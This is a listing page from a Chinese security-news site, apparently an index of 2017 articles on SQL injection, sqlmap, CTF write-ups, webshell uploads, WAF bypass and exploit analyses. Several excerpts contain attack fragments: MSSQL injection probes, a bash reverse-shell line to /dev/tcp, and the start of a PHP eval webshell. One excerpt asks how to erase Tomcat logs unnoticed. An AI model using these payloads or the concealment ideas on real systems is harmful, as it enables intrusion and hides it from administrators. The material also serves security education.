欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!
  • Web 安全 PHP 代码审查之常规漏洞
  • 工欲善其事,必先利其器。我们做代码审计之前选好工具也是十分必要的。下面我给大家介绍两款代码审计中比较好用的工具。 一、审计工具介绍 PHP 代码审计系统— RIPS 功能介绍 RIPS 是一款基于 PHP 开发的针......
  • 所属分类:网站安全 更新时间:2017-07-23 相关标签: 阅读全文...
  • 黑客入侵网站会留下哪些痕迹
  • 黑客入侵网站会留下哪些痕迹? 1、隐藏不完美,有痕迹可循 2、没后台 3、得罪了不该得罪的势力 尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性,然而由于系统管理员的水平参差不齐或安全意识底下,......
  • 所属分类:网站安全 更新时间:2017-07-23 相关标签: 阅读全文...
  • DVWA下的盲注<SQLmap工具注入>
  • 所需工具: DVWA环境、抓包工具、sqlmap 抓包工具用fiddler为例。 = 先进入DVWA调整模式为LOW 打开抓包工具,确定可以抓到http流量包 DVWA下选择SQL盲注,随意输入一个USER ID后回车 会看到回显,用户ID存......
  • 所属分类:网站安全 更新时间:2017-07-23 相关标签: 阅读全文...
  • MSSQL手工注入
  • 注入点屏蔽了and语句and 1=2 没有报错,就用or语句。 and (select count(*) from sysobjects)>0 返回正常就是mssql数据库 and 1=(select @@version) 查看版本信息 and 1=(select db_name())获取当前所在数......
  • 所属分类:网站安全 更新时间:2017-07-23 相关标签: 阅读全文...
  • 天网管理系统
  • 点开页面点击登陆没反应,先不管,老样子直接看源码:一不小心就发现了提示 要求是输入的账户通MD5加密后,与零进行比较,通过应该就得到下一步提示: 由于PHP弱类型语言的缘故,有下图特性 由此可以......
  • 所属分类:网站安全 更新时间:2017-07-23 相关标签: 阅读全文...
  • 因缺思汀的绕过
  • 一开始,直接看页面源代码,发现提示:siyrce.txt进去查看,发现是PHP代码 经过分析可知: 想要得到flag必须先绕过这3点: 不能使用上述关键字 数据库影响数为1 通过第三个if 第一个不使用即可通过 第二个返......
  • 所属分类:网站安全 更新时间:2017-07-18 相关标签: 阅读全文...
  • 简单sql注入之3
  • 进去输入1观察发现: 2,3都只有一个结果Hello!,我们输入4观察一下 发现空白,于是输入sql注入语句:1' and '1'='1 没有报错,也有显示Hello!于是判断出,该题目没有过滤,只能用基于Hello!回显的sql注......
  • 所属分类:网站安全 更新时间:2017-07-18 相关标签: 阅读全文...
  • 简单sql注入之2
  • 提示:有回显的sql注入 这题其实使用上一篇博文的/**/技术即可获得flag 上一篇博文简单sql注入补充: 其实那题还过滤了关键词加空格(只过滤一遍,所以写两遍即可),出题者考的是如下sql语句(空格和关键词都......
  • 所属分类:网站安全 更新时间:2017-07-18 相关标签: 阅读全文...
  • SQL注入之骚姿势小记
  • 1、IN之骚 这个我也偶然发现的,也不知前辈们有没有早已总结好的套路了。 对它的描述:IN操作符允许我们在WHERE子句中规定多个值。也就说可以让我们依照一或数个不连续(discrete)的值的限制之内抓出数据库中的值。......
  • 所属分类:网站安全 更新时间:2017-07-18 相关标签: 阅读全文...
  • 简单的sql注入
  • 根据页面提示,到底过滤了什么东西?可以知道一定过滤了什么.... 分别输入1,2,3有对应的结果 使用'会报错,于是 构造常用的sql语句:1' and '1'='1 没有反应试一试1' and '1'='2 还是没反应......
  • 所属分类:网站安全 更新时间:2017-07-17 相关标签: 阅读全文...
  • 售价500美元的喀秋莎SQL扫描器好在哪里?
  • 2017年4月8日,一位俄语用户在某黑客论坛介绍了名为喀秋莎(Katyusha Scanner)的扫描器,号称是一款非常强大的自动化SQL扫描器。与现在的大部分扫描器不同,这款SQL漏洞扫描器的售价也高得惊人,达到了500美元,但是高......
  • 所属分类:网站安全 更新时间:2017-07-16 相关标签: 阅读全文...
  • 教你sqlmap,sqlmap的安装及使用
  • 首先,sqlmap是基于Python下的一款扫描注入环境 所以 首先得下载好 python 和 sqlmap Python 于百度下载就可以了 那么sqlmap呢 去官网 http://sqlmap.org/ 都下载下来呢 先安装 python 记......
  • 所属分类:网站安全 更新时间:2017-07-12 相关标签: 阅读全文...
  • sqlmap注入,杀入靶机
  • 用phpstudy 链接 dvwa 搭建一个环境 而后呢,我们要使用抓包软件抓一下dvwa的cookie 让我们先来看一下演示: 首先进入dvwa 将难度设置为low(为了演示方便) 接着呢 要使用用抓包 抓出......
  • 所属分类:网站安全 更新时间:2017-07-12 相关标签: 阅读全文...
  • 为渗透测试准备的 10 大黑客工具
  • 工匠需要相应的技能和工具才能工作,并创造出杰作。 虽然工具是工作的过程中的重要推动因素,但也需要工匠具有相关的经验和专业知识。 渗透测试人员的工具箱非常像工匠的工具箱,可根据业务目标使用各种各样的工具。......
  • 所属分类:网站安全 更新时间:2017-07-12 相关标签: 阅读全文...
  • CVE-2015-1641 Word 利用样本分析
  • 作者:知道创宇404实验室 0 引子 本文我们将通过一个恶意文档的分析来理解漏洞 CVE-2015-1641( MS15-033 )的具体利用过程,以此还原它在现实攻击中的应用。就目前来看,虽然该 Office 漏洞早被修复,但由于其受影......
  • 所属分类:网站安全 更新时间:2017-07-12 相关标签: 阅读全文...
  • 挖洞姿势|浅析命令注入漏洞
  • 命令注入是一种常见的漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。说到这里,我们不得不提另外一个叫做远程代码执行(RCE)的漏洞——许多人总会把这两个漏洞混淆,其实它们是有......
  • 所属分类:网站安全 更新时间:2017-07-12 相关标签: 阅读全文...
  • 字幕攻击技术细节
  • 前言 最近CheckPoint公司的研究人员对一种全新的攻击方式——字幕攻击,进行了一个全面研究。其实说起字幕攻击,研究人员嘶吼编辑组曾在今年5月进行过相关的跟踪研究,并对攻击者如何使用字幕文件来控制用......
  • 所属分类:网站安全 更新时间:2017-07-12 相关标签: 阅读全文...
  • 方法虽老但依然有效:如何使用ZIP bomb来保护网站
  • 我不知道你是否自己运营过一个网站或当过某个服务器的管理员,但如果你做过的话,你就会非常清楚地知道外面有多少坏人随时都在想着如何攻击你的网站或服务器。 想当初我还是十三岁的时候我就自己架设了我第一台服务......
  • 所属分类:网站安全 更新时间:2017-07-11 相关标签: 阅读全文...
  • webshell后门上传流程
  • 1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。 2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有......
  • 所属分类:网站安全 更新时间:2017-07-10 相关标签: 阅读全文...
  • VSFTPD v2.3.4后门分析
  • 作者:k0shl 转载请注明出处:http://whereisk0shl.top 这个漏洞和二进制漏洞关系不大,是一个后门分析,这个vsftpd的版本在网上比较难找,还是去google搜一下吧.. 漏洞说明 PoC: #!/usr/bin/python #coding:u......
  • 所属分类:网站安全 更新时间:2017-07-09 相关标签: 阅读全文...
  • 研究人员利用旁路攻击窃取加密信息
  • 过去几年发现的针对 SSL/TLS 的攻击通常需要攻击者处于中间人的位置,也就是要求中间人攻击者能嗅探或操控流量。两位安全研究人员在 Black Hat 安全会议上报告了一种新的组合旁路攻击的方法,不需要中间人去嗅探流量......
  • 所属分类:网站安全 更新时间:2017-07-08 相关标签: 阅读全文...
  • 花无涯带你走进黑客世界之 注入攻击 (上)
  • SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶......
  • 所属分类:网站安全 更新时间:2017-07-06 相关标签: 阅读全文...
  • 化无为有的漏洞挖掘-刷钱漏洞是这样的~
  • 前言: 很久没给知乎的粉丝发干货了,因为知乎的密码找了半天才找回来,很是曲折~希望大家谅解。 其实很早的时候就想研究这个HTTP线程并发测试了,但是一直在做其他的事情就给耽搁了。 一个坑: 为什么我要......
  • 所属分类:网站安全 更新时间:2017-07-02 相关标签: 阅读全文...
  • web安全之如何全面发现系统后台
  • 前言 所谓的网站后台管理系统主要是用于对网站前台的信息管理,如文字、图片、影音、和其他日常使用文件的发布、更新、删除等操作,同时也包括会员信息、订单信息、访客信息的统计和管理等相关操作。简单来说就是对......
  • 所属分类:网站安全 更新时间:2017-07-02 相关标签: 阅读全文...
  • Tomcat访问日志删不掉,怎么办
  • 现在遇到一个很尴尬的问题,shell有administrator权限,但是Tomcat运行着的话就删不了访问日志,就算是以前的也删不了,不知道这Tomcat用了什么黑科技,然后现在我也不能关Tomcat,一关的话网管就发现了,而且我shel......
  • 所属分类:网站安全 更新时间:2017-06-30 相关标签: 阅读全文...
  • 渗透测试 Node.js 应用
  • 在本文中我们将介绍,在渗透中遇到 Node.js 应用如何处理,以及常见的一些 Node.js 的漏洞。 ி 介绍 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境。Node.js 使用了一个事件驱动、非阻塞式 I/O ......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 渗透测试之反弹shell命令分析
  • 我们在对linux主机进行渗透测试的时候,经常回用到反弹shell,之前也没好好去研究、理解具体都是干什么的,就只知道会用…(so low…-.-) 最基本的反弹shell的代码如下: bash -i >& /dev/tcp/192.168.1.1/8080 ......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 对某网站的一次简单渗透测试
  • 此文纯属虚构,纯属娱乐,内容较小白,大牛飘过。 今天心血来潮想拿学校主站的源码看看。 今天阳光明媚,帮我以前学校再做次安全测试。 曾经测试过,主站是动易CMS2006,网上没有公开的漏洞。 中间件是IIS7.5,......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 对某CMS的一次简单渗透测试
  • 好久没有更新博客了,这几天在研究mysql注入,想弄个luanmap玩玩。 写了下mysql的报错注入和union注入,顺便拿公司内网的一个系统测试了下,唯一欠缺的地方就是没有用substr截取结果,有时候报错注入的结果显示长......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 渗透测试小技巧之过waf木马
  • 在研究webshell查杀的时候,学习别人怎么绕waf的思路,今天发现一个很6的函数(至少之前我是没见过),然后结合之前写访问日志记录文件时用到的方法,very perfect! Once step 普通一句话木马: <?php eval($_PO......
  • 所属分类:网站安全 更新时间:2017-06-24 相关标签: 阅读全文...
  • 本类最新更新
    • 本类热门文章
      • 最新下载
        • 标签云集